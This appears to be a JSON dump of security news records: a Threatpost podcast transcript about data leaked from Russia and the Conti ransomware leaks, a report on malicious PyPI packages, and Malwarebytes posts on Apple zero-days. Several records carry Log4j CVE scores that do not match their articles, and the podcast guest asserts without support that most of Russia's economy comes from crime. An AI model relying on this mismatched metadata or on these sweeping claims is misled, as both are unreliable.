Assessments](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUY-2Flf1YfJi8Jl6Pa8fYnwMooXA0t7nRcGwuHZmhL1VNFMgZ7_ZRLSPEhX0sWy6v6-2FW4BoBGwvynWnvEEKCCoI2tE2RSv7Ap1BbaYTRGgOsmBtH3N8QKMiyASu9uND9imXoTFn2Ec5EmRJ9V9NBrK7aLIAhF6196NdmcyMkxC1VH7FuP-2B9MgrfUoUGWizcYBWkO7YHK-2FSUvJvNf4hmd993Dye56pyq89HFwWZoHTuzoXanpznaaoSlcLfzlPiOUFNRXQsUtdLW6-2BFIvjy5oI3kpt8fOysQ-2BJJ7pNAMDmmGf2nc2TWwK5J4rfFBha96XAcFn5Tdh8idS0UjuT6a1Fel8Ug5x5WkloyV8fxoFRJXaTFLqD0L0IDktPIPckEiewFCmD6TiVprT0ERdmp5-2BqTF3UZ3I98-3D>)**, **in an email to Threatpost. \u201cContinuous intelligence, monitoring, and dialogue with critical partners and suppliers should be ongoing to ensure \u2018all is ready\u2019 in the event recovery is needed, and that additional support is available in the event something were to occur.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-08T14:14:59", "type": "threatpost", "title": "China Suspected of News Corp Cyberespionage Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-08T14:14:59", "id": "THREATPOST:3B06E49AA3C9F001C97038682A9BF73F", "href": "https://threatpost.com/china-suspected-news-corp-cyberespionage/178277/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T03:51:25", "description": "Information about nuclear plants and air force capabilities. Conti ransomware gang crooks [conjecturing](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>) that the National Security Agency (NSA) was maybe behind the mysterious, months-long [TrickBot](<https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/>) [lull](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>). [Doxxed data](<https://www.theregister.com/2022/03/02/russian_soldier_leaks/>) about 120K Russian soldiers.\n\nThose are just some of the sensitive, valuable data that\u2019s being hacked out of Russia in the [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) \u2013 a war that erupted [even before](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) the country invaded Ukraine.\n\n\u201cEveryone is so focused on Russia hacking the world, but the world has been hacking Russia\u2026. And dumping a lot of critical data on military, nuclear plants, etc.,\u201d said Vinny Troia, cybersecurity Ph.D. and founder of [ShadowByte](<https://shadowbyte.com/>), a dark web threat intelligence and cyber fraud investigations firm.\n\nHe\u2019s one of an untold number of experts on dark-web threat intelligence who\u2019ve been pouring over the intel that\u2019s been flooding out of practically every nook and cranny of the internet: data that\u2019s being posted on Twitter, Telegram and within the multiple dumps of insider knowledge about the Conti ransomware gang posted by the Ukrainian supporter ContiLeaks.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThat ongoing dump, which has included [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for Conti and TrickBot, a decryptor (that doesn\u2019t help recent victims whose files have been encrypted by the Conti gang, unfortunately), and much more, stopped yesterday when the Conti gang shut down its Jabber servers, Troia told Threatpost on Wednesday.\n\nHe visited the Threatpost podcast to update us on the mountain of data about Russia that intelligence experts are now slogging through.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030222_Vinny_Troia_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>). Also, see below for a lightly edited transcript. \n\n\n## Lightly Edited Transcript\n\n**Lisa Vaas:** Listeners, welcome to the Threatpost podcast. My guest today is Vinny Troia, cybersecurity PhD and founder of ShadowByte, a dark web threat intelligence and cyber fraud investigations firm. Today, we\u2019re going to focus on all of the data that\u2019s being leaked on Russia as a result of its invasion of Ukraine.\n\n**Lisa Vaas:** Thanks for coming on the podcast. Vinny, before we jump in, could you give us a bit of your background, please?\n\n**Vinny Troia:** Sure. Thanks for having me. Yes. So my background I come from a DOD background did a lot of work for surface deployment command. And yeah, I was there for about, I think six or seven years before moving over to private sector.\n\n**Vinny Troia:** And while I was there, I did a lot of work in compliance and random security hacking projects, a lot of red teaming, pen testing. And then eventually I started my own firm. Fast forward to today, our focus now is primarily dealing with a lot of ransomware cases, incident response, and we do a lot of ransom negotiations as well.\n\n**Vinny Troia:** We\u2019re constantly focused on dark web threat actors and any of the players, really.\n\n**Lisa Vaas:** Thank you for that. And well this past week must be just a flurry with the dark web activity around Ukraine and Russia. So in an email, you were talking about how everyone is so focused on Russia hacking the world, but the world has been also hacking Russia and dumping a lot of critical data on military nuclear plants, etc.\n\n**Lisa Vaas:** Where is your Intel coming from? Are there any forums in particular that you\u2019re clued into or is that something you can\u2019t even discuss?\n\n**Vinny Troia:** it\u2019s not even like that. It\u2019s a, I mean, it\u2019s literally everywhere. I mean, there\u2019s Telegram channels. I mean, some is just being pasted right on Twitter.\n\n**Vinny Troia:** I mean, it\u2019s literally coming from all angles at this point.\n\n**Lisa Vaas:** Well, tell me what you\u2019re seeing.\n\n**Vinny Troia:** I\u2019d say last month, there was a lot of data coming out about Ukrainian citizens. I mean, a lot. So that was kind of interesting, almost like a precursor to what was happening.\n\n**Vinny Troia:** And now it\u2019s almost like, the rest of the world that\u2019s really pissed and started hacking back and you\u2019re seeing so much data coming out. I\u2019m actually looking for sorry, as we speak, I\u2019m going through some of this data. I mean, there\u2019s stuff on a nuclear plants, some of their air force capabilities.\n\n**Vinny Troia:** There\u2019s another database that I just recently came across that is about a hundred thousand of their military members with photos, passport numbers, things like that. I mean, it\u2019s really just data coming from all depths of. From other infrastructure,\n\n**Lisa Vaas:** well, who, who, who is the primary sources?\n\n**Lisa Vaas:** I mean, I know that anonymous of course has jumped in to, to, to wage war on behalf of Ukraine, cyber war on behalf of Ukraine. And I know that you can put out a call for help from cyber experts on this too. So who, who exactly is, is. Hacking this stuff out of Russia.\n\n**Vinny Troia:** I mean, I, honestly, I couldn\u2019t tell you, I mean, it\u2019s coming, like I said, it\u2019s coming from all sorts of places.\n\n**Vinny Troia:** Right. And when things get leaked, I mean, they just get leaked from various [sources\u2019] usernames on forums or Telegram channels. And so you never really know who it\u2019s coming from. It is interesting that the world kind of banded together against this. And Russia was supposed to have this big cyber arsenal against them.\n\n**Vinny Troia:** And it\u2019s really funny that Joe Biden didn\u2019t mention security once in the state of the union last night, being that it was such a big deal and everybody\u2019s been talking about it.\n\n**Lisa Vaas:** Yeah. And, and I remember it was an NBC news last week or, or was reporting on the big cyberattacks, the major offensive cyberattacks that were being discussed at the White House, but then the White House denied [considering offensive cyberattacks].\n\n**Vinny Troia:** The news has been all about cyberattacks and Russia\u2019s capabilities and it\u2019s such a priority, but it just wasn\u2019t even mentioned once. I just, I find that really strange, but regardless, it\u2019s nice that the world kind of banded together to really come after Russia. One of the most, honestly, just incredibly fascinating things is all these leaks that have been occurring regarding the Conti ransomware. Yes. And they\u2019re arguably the largest or at least one of the top few largest ransomware groups in the world. And I mean, they\u2019re just having everything leak: source code, recovery, keys, chat logs.\n\n**Vinny Troia:** I mean, as early, as recently as today with the most recent chat logs that came out, so somebody still has access to their servers and I haven\u2019t even had a chance to read the ones from today.\n\n**Lisa Vaas:** I just wrote up the second dump and I didn\u2019t even know there was more posted today. It\u2019s so hard to keep up. Can we talk a little bit about those dumps? Now as I understand it, it\u2019s the decryptor for version two of the Conti Lock ransomware software [that was leaked]. That\u2019s not even going to be usable to anybody because it was for an older version.\n\n**Lisa Vaas:** How is this going to affect Conti? Another one of my sources was telling me that just one of the gang\u2019s groups got hit by this [leak] and everybody else is pretty much doing fine. They\u2019re carrying on business as usual.\n\n**Vinny Troia:** I think what\u2019s really interesting. And they talked about this in one of the, in some of the logs. So Conti uses, or used, this one piece of software called TrickBot in order to disseminate and \u2026 one of the or groupings of the chat log showed that the NSA came after TrickBot specifically.\n\n**Vinny Troia:** I don\u2019t know whether or not they reverse engineered or what they did, but I mean, they were able to shut it down for a couple of weeks just by changing patch numbers and uploading them to a server that would accept the changes. And so what they did was they maxed out the maximum patch number.\n\n**Vinny Troia:** The software couldn\u2019t take any new updates at that point. So they effectively shut it down for a little bit. That was actually really amazing.\n\n**Lisa Vaas:** I totally missed that. Which repository was that in? What\u2019s the name of the repository?\n\n**Vinny Troia:** It\u2019s all JSON files.\n\n**Lisa Vaas:** Everybody knew that TrickBot pretty much shut down for a few months, but I didn\u2019t know that about the NSA piece.\n\n**Vinny Troia:** It\u2019s presumed to be the NSA, given the level of skill that was involved, we\u2019ll call it finesse. I would say it would have to be some government agency.\n\n**Lisa Vaas:** Was there chatter about the shutdown?\n\n**Vinny Troia:** Yeah, it\u2019s basically a handful of officials talking about it and how they were shut down and how they basically had to rebuild their infrastructure.\n\n**Vinny Troia:** They were down for a little bit and eventually they came back, but it just shows that they were being targeted by nation states. I think the most interesting thing is, if this really is a Russian operated group, which is what it seems like, then the fact that all these files are being leaked, whether it\u2019s from an insider or somebody who\u2019s a researcher who\u2019s attacking them specifically, I think this is going to have a major toll on Russia\u2019s finances, especially considering this is a group that is averaging what, a couple hundred million dollars a year recurring revenue?\n\n**Lisa Vaas:****** I don\u2019t expect you to know this, but maybe you do: How much of Russia\u2019s economy is actually coming from ransomware or other malware?\n\n**Vinny Troia:** I think the majority, actually. So I think the majority of Russia\u2019s economy is coming from some sort of crime. There\u2019s not a whole lot going on over there. It\u2019s like a big wasteland,\n\n**Lisa Vaas:** Right. The underground members say \u201cprotect the motherland, the motherland protects you. \u201cExcept for when they need some stooges to arrest, some low-level stooges to make the U.S. happy, which happened recently.\n\n**Vinny Troia: **As far as the decryptor [goes], you\u2019re correct. It is for an older version. I think I saw some keys floating around as well, but new code is written on top of old code and it\u2019s not like it was replaced completely. So I would imagine that there will be some fallout from that code base.\n\n**Lisa Vaas:** Yeah, there\u2019s a lot of code to go through. I hear. So what were some other really great finds in the intelligence that we\u2019re getting out of Russia during this crisis?\n\n**Vinny Troia:** It\u2019s information on citizens, it\u2019s information on military members. I\u2019ve seen things on nuclear plants. I can\u2019t speak to what can be done with all of it, honestly, but the point is it\u2019s there and, in the right hands, I\u2019m sure it could be pretty useful.\n\n**Lisa Vaas:** I assume, during these days, it\u2019s just not going to let up.\n\n**Vinny Troia:** No, and like I said, a couple of hours ago we had more leaks from their Jabber server. So I would imagine whoever has access has been able to pull off a lot, and I think [Conti] actually just shut it down finally.\n\n**Lisa Vaas:** So that means they they shut down Jabber. That doesn\u2019t mean that they figured out who the leaker is. Right?\n\n**Vinny Troia:** The person leaking it goes by [ContiLeaks]. But whether or not he\u2019s the one with access, I don\u2019t know. But the point is they figured out that somebody did have access to their Jabber logs. So now they\u2019ve moved servers.\n\n**Lisa Vaas:** Well, awesome. What else can you tell listeners? What can you leave us with?\n\n**Vinny Troia:** I would say that, just because Conti\u2019s out doesn\u2019t mean that the problem is going away anytime soon. So be diligent and keep up with your passwords and make sure that you actually have fresh passwords, because looking at these logs and how they\u2019re getting into a lot of these systems, it\u2019s just using other people\u2019s recycled passwords.\n\n**Vinny Troia:** The hacks they\u2019re using aren\u2019t even that sophisticated. And I mean, even now the majority of hacks are still caused by reused passwords.\n\n**Lisa Vaas:** We can get some intelligence out of the exploits that they\u2019re targeting. I think I saw Zerologin was mentioned as one, and of course we know a lot about their tooling right now. Like the whole Cobalt Strike beacon thing.\n\n**Vinny Troia:** Cobalt Strike\u2019s been a red teaming tool forever. It\u2019s a staple. For pen testers, it\u2019s an amazing tool. And so the fact that they were using it isn\u2019t really a surprise.\n\n**Lisa Vaas:** Well, is there anything surprising that was found in the dumps? I know that we\u2019ve got email addresses of some of the members of the gang.\n\n**Vinny Troia:** You can use that to look for other accounts and potentially start to reverse back to maybe who they are. But I mean, there\u2019s so much information here. I haven\u2019t even gone through maybe a 10th of it. It\u2019s coming up too fast. It\u2019s a full-time job. It takes a full-time team at this point to go through all of this. Because then there was another thing that came out: rocket chat logs from a rocket chat. There\u2019s thousands of logs here.\n\n**Lisa Vaas:** Yeah, that\u2019s pretty bad. When you\u2019ve got a researcher, an intel expert who says he\u2019s getting too much: The firehouse is open so wide. So the takeaways for listeners are that these leaks haven\u2019t stopped, and we don\u2019t even know how many that [ContiLeaks] is promising.\n\n**Vinny Troia:** I mean, the fact that today\u2019s leaks caused the shutdown, I presume caused a shut down of their Jabber server. I\u2019m going to say that well has pretty much run dry. I don\u2019t know what else is going to be released in terms of tools, but I\u2019d say all of this has probably put a dent in everything they\u2019re doing for a little bit.\n\n**Lisa Vaas:** We can hope so, but I don\u2019t think we should assume anything. And that\u2019s what you\u2019re telling us: They\u2019re still going to be active and they\u2019re going to retool anyway. Right. And will resurface.\n\n**Vinny Troia:** Yeah. I was going to say, giving credit to [security journalist Brian] Krebs on this one, one of the things he reported on was that there was a conversation, and I haven\u2019t even made it to the set about how the ransomware groups were being investigated.\n\n**Vinny Troia:** And someone high up in the group basically told them they didn\u2019t have anything to worry about. The investigation was going to go off of them. And that was right around the time that Russia took down REvil. So it was interesting. It\u2019s almost like they had insider information, or maybe they literally were working for [Russia].\n\n**Lisa Vaas:** I think REvil. that takedown, was the one I was thinking about when I alluded to this kind of token law enforcement action on Russia\u2019s part to maybe make the U.S. shut up. Now I have to go read Brian Krebs. Why didn\u2019t I read Brian Krebs earlier today? I have to do that. That\u2019s like a requirement of the job. OK, well, Vinnie, unless you\u2019ve got anything else to add, I\u2019m going to let you go.\n\n**Vinny Troia:** No, all good.\n\n**Lisa Vaas:** I appreciate it. Thank you so much. Thanks for coming on the podcast.\n\n030322 10:49 UPDATE: ContiLeaks, the source of the Conti leaks, is not believed to be the same entity as vx_underground, which has disseminated the leaked files.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T16:31:36", "type": "threatpost", "title": "Russia Leaks Data From a Thousand Cuts\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T16:31:36", "id": "THREATPOST:6C547AAC30142F12565AB289E211C079", "href": "https://threatpost.com/russia-leaks-data-thousand-cuts-podcast/178749/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:26", "description": "Three malicious packages hosted in the Python Package Index (PyPI) code repository have been uncovered, which collectively have more than 12,000 downloads \u2013 and presumably slithered into installations in various applications.\n\nIndependent researcher Andrew Scott found the packages during a nearly sitewide analysis of the code contained in PyPI, which is a repository of software code created in the Python programming language. Like GitHub, npm and RubyGems, PyPI allows coders to upload software packages for use by developers in building various applications, services and other projects.\n\nUnfortunately, a single malicious package can be baked into multiple different projects \u2013 infecting them with cryptominers, info-stealers and more, and making remediation a complex process.\n\nIn this case, Scott found a malicious package containing a known trojan malware and two info-stealers.\n\nThe trojanized package is called \u201caws-login0tool,\u201d and once the package is installed, it fetches a payload executable that turns out to be a [known trojan](<https://www.virustotal.com/gui/file/79d9ecfcc143ae3216904c882a3984a90901536e6fccd223eb9bf78d943df1cd>), he said.\n\n\u201cI found this package because it was flagged in multiple text searches I did looking at setup.py, since that\u2019s one of the most common locations for malicious code in Python packages since arbitrary code can be executed there at install time,\u201d Scott explained in a [Sunday posting](<https://medium.com/ochrona/3-new-malicious-packages-found-on-pypi-a6bbb14b5e2>). \u201cSpecifically I found this by looking for import urllib.request since this is commonly used to exfiltrate data or download malicious files and it was also triggered by `from subprocess import Popen` which is somewhat suspicious because most packages don\u2019t need to execute arbitrary command line code.\u201d\n\nScott also identified two other malicious packages by looking at the import urllib.request string, both of which are built for data exfiltration.\n\nNamed \u201cdpp-client\u201d and \u201cdpp-client1234I,\u201d the two were uploaded by the same user in February. During installation, they collect details on the environment and file listings, and appear to \u201cbe looking specifically for files related to Apache Mesos,\u201d Scott said, which is an open-source project to manage computer clusters. Once the information is gathered, it\u2019s sent off to an unknown web service, according to the researcher.\n\nThe Python security team removed the identified packages once notified on Dec. 10, but all three packages live on thanks to the projects that imported them prior to the removal.\n\nScott said that the trojan package was first added to PyPI on Dec. 1. It was subsequently downloaded nearly 600 times. As for the data stealers, the dpp-client package has been downloaded more than 10,000 times, including 600+ downloads in the last month; dpp-client1234 has been downloaded around 1,500 times. and both packages mimicked an existing popular library with their source code URL, \u201cso anyone browsing to the package in PyPI or analyzing how popular the library was would see a large number of GitHub stars and forks \u2013 indicating a good reputation.\u201d\n\nThe software-supply chain has become an increasingly popular method of distributing malware. Last week, for instance, a series of malicious packages in the Node.js package manager (npm) code repository that looked to harvest Discord tokens [was found.](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>) The packages can be used to take over unsuspecting users\u2019 accounts and servers.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T18:46:34", "type": "threatpost", "title": "Malicious PyPI Code Packages Rack Up Thousands of Downloads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T18:46:34", "id": "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "href": "https://threatpost.com/malicious-pypi-code-packages/176971/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-01-27T23:27:10", "description": "Apple has released patches for iOS 15.3, iPadOS 15.3, and macOS Monterey 12.2 and is urging users to update. The most significant reasons are two actively exploited zero-day vulnerabilities, one of which has a publicly disclosed Proof-of-Concept (PoC).\n\nUsing this vulnerability, designated [CVE-2022-22587](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22587>), a malicious app could execute random code with kernel privileges.\n\n## Why did it take so long\n\nThe zero-day appears to have been found and reported by at least two researchers independently of each other. Apple acknowledged an anonymous researcher, Meysam Firouzi (@R00tkitSMM) of MBition \u2013 Mercedes-Benz Innovation Lab, and Siddharth Aeri (@b1n4r1b01) for having reported this flaw.\n\nThe two researchers both stated that it took a long time for this bug to be acknowledged and fixed. One of them posted a Proof-of-Concept (PoC) on January 1st.\n\n> while my californian friends are still waiting for 2022 how about a kernel oob read that works on the latest iOS 15.2  <https://t.co/qo0WLLsQIV> <https://t.co/HZA0y5Sghi>\n> \n> -- binaryboy (@b1n4r1b01) [January 1, 2022](<https://twitter.com/b1n4r1b01/status/1477172028524355585?ref_src=twsrc%5Etfw>)\n\nThe other researcher reported the issue through the Zero-Day-Initiative (ZDI) three months ago, waited for two months and then decided to report to Apple directly.\n\n> I reported this vulnerability to [@thezdi](<https://twitter.com/thezdi?ref_src=twsrc%5Etfw>) about 3 months ago and unfortunately they didn\u2019t answer me for like 2 months, then i canceled my report and sent it to apple directly. And we see it had been exploited in the wild. <https://t.co/RjnjiY4esr>\n> \n> -- Meysam Firouzi (@R00tkitSMM) [January 26, 2022](<https://twitter.com/R00tkitSMM/status/1486477431431065601?ref_src=twsrc%5Etfw>)\n\nThe Zero Day Initiative (ZDI) was created to encourage the reporting of zero-day vulnerabilities privately to the affected vendors by financially rewarding researchers, although there has been some complaints from researchers that they didn&#x27;t feel they were taken seriously by the ZDI.\n\n## IOMobileFrameBuffer\n\nCVE-2022-22587 is a memory corruption bug in the IOMobileFrameBuffer that affects iOS, iPadOS, and macOS Monterey. IOMobileFrameBuffer is a kernel extension for managing the screen FrameBuffer. An earlier vulnerability in this extension, listed as [CVE-2021-30807](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30807>), was tied to the [Pegasus spyware](<https://blog.malwarebytes.com/privacy-2/2021/07/pegasus-spyware-has-been-here-for-years-we-must-stop-ignoring-it/>). Another one was listed as [CVE-2021-30883](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30883>) and also allowed an application to execute arbitrary code with kernel privileges. We hope that the input validation has now been curated to makes this impossible in the future.\n\n## Actively exploited\n\nApple [acknowledged](<https://support.apple.com/en-us/HT213053>) that it was aware of a report that this issue may have been actively exploited.\n\n## Safari Webkit bug\n\nThe second zero-day is the Safari WebKit bug in iOS and iPadOS that [allowed websites to track your browsing activity and users&#x27; identities](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/01/browsers-on-ios-ipados-and-mac-leak-your-browsing-activity-and-personal-identifiers/>) in real-time. After a researcher of FingerprintJS disclosed the bug in November, it was assigned the [CVE-2022-22594](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22594>) and has been fixed.\n\n## Updates\n\niOS 15.3 and iPadOS 15.3 fixes a total of ten security bugs. The updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n\n\n\nmacOS Monterey 12.2 patches a total of 13 vulnerabilities in total. The latter also promises to bring smoother scrolling to MacBooks, fixing a previously reported scrolling issue in Safari.\n\nApple also released security fixes for legacy versions of macOS Big Sur and Catalina.\n\nStay safe, everyone!\n\nThe post [Update now! Apple patches another actively used zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/01/update-now-apple-patches-another-actively-used-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-27T21:56:12", "type": "malwarebytes", "title": "Update now! Apple patches another actively used zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30807", "CVE-2021-30883", "CVE-2022-22587", "CVE-2022-22594"], "modified": "2022-01-27T21:56:12", "id": "MALWAREBYTES:C265FF6D1D82CDE3FB6E6C1E4248A791", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/01/update-now-apple-patches-another-actively-used-zero-day/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-21T00:04:01", "description": "On Monday, Apple released a long list of patched vulnerabilities to its software, including a new zero-day flaw affecting Macs and iPhones. The company revealed it's aware that threat actors may have been actively exploiting this vulnerability, which is tracked as **[CVE-2022-32917](<https://cve.report/CVE-2022-32917>)**.\n\nAs it's a zero-day, nothing much is said about CVE-2022-32917, only that it may allow malformed applications to execute potentially malicious code with kernel privileges. Apple says it's patched this flaw with improved bounds checks. Below is a list of products this bug affects:\n\n * Macs running [macOS Monterey 12.6](<https://support.apple.com/en-us/HT213444>) and [macOS Big Sur 11.7](<https://support.apple.com/en-us/HT213443>)\n * iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nCVE-2022-32917 is the eighth zero-day flaw that Apple has addressed since the beginning of 2022. The first seven are as follows:\n\n * [CVE-2022-32894](<https://cve.report/CVE-2022-32894>), a flaw in the iOS Kernel, was patched in August\n * [CVE-2022-32893](<https://cve.report/CVE-2022-32893>), a flaw in WebKit, was patched in August\n * [CVE-2022-22674](<https://cve.report/CVE-2022-22674>), an Intel Graphics Driver bug, was patched in March\n * [CVE-2022-22675](<https://cve.report/CVE-2022-22675>), a bug in AppleACD, was patched in March\n * [CVE-2022-22620](<https://cve.report/CVE-2022-22620>), a WebKit bug affecting iPhones, Macs, and iPads, was patched in February\n * [CVE-2022-22587](<https://cve.report/CVE-2022-22587>), a privileged code execution flaw, was patched in January\n * [CVE-2022-22594](<https://cve.report/CVE-2022-22594>), a web browser activity tracking flaw, was patched in January\n\n## Mitigation\n\nSince we received a lot of questions about what actions are needed, we're adding this section for your convenience.\n\nThe necessary updates for these vulnerabilities were included in:\n\n * the [September 12 update for macOS Big Sur 11.7](<https://support.apple.com/en-us/HT213443>).\n * the [September 12 update for macOS Monterey 12.6](<https://support.apple.com/en-us/HT213444>).\n * the [September 12 update for iOS 15.7 and iPadOS 15.7](<https://support.apple.com/en-us/HT213445>). \n\nThese should all have reached you in your regular update routines, but it doesn't hurt to check if your device is at the [latest update level](<https://support.apple.com/en-us/HT201222>). \n\n[How to update your iPhone or iPad.](<https://support.apple.com/en-us/HT204204>)\n\n[How to update macOS on Mac](<https://support.apple.com/en-us/HT201541>).\n\nIf you fear your Mac has been infected, try out [Malwarebytes for Mac](<https://malwarebytes.com/mac>). 